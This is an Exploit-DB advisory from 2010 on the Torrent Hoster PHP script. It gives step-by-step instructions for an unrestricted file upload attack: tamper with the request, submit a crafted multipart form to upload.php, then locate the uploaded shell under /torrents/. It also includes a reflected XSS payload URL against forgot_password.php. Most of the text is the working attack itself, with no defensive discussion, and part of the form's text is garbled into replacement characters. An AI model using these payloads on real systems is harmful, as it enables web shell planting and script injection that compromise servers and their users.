Torrent Hoster - Remount Upload

EDB-ID:

11746

CVE:

N/A




Platform:

PHP

Date:

2010-03-15


========================================================================================                  
| # Title    : Torrent Hoster Remont Upload Exploit           
| # Author   : El-Kahina                                                                                                                
| # Home     : www.h4kz.com                                                                              |                                                                                                                               
| # Script   : Powered by Torrent Hoster.     
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       
| # Bug      : Upload    
|                                                                  
======================      Exploit By El-Kahina       =================================
 # Exploit  : 
 
 1 - use tamper data :
 
 http://127.0.0.1/torrenthoster//torrents.php?mode=upload
 
 2- 
    <center>
   Powered by Torrent Hoster
        <br />
        <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
        <strong>&#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; &#65533;&#65533; &#65533;&#65533;:</strong> <?php echo $maxfilesize; ?>&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;<br />
<br>
        <input type="file" name="upfile" size="50" /><br />
<input type="submit" value="&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;" id="upload" />
        </form>
        <div id="part2" style="display: none;">&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; .. &#65533;&#65533; &#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;</div>
        </center>
        
3 - http://127.0.0.1/torrenthoster/torrents/  (to find shell)      
        
4 - Xss:

http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
       
==========================================
Greetz : Exploit-db Team 
all my friend :(Dz-Ghost Team ) 
im indoushka's sister
------------------------------------------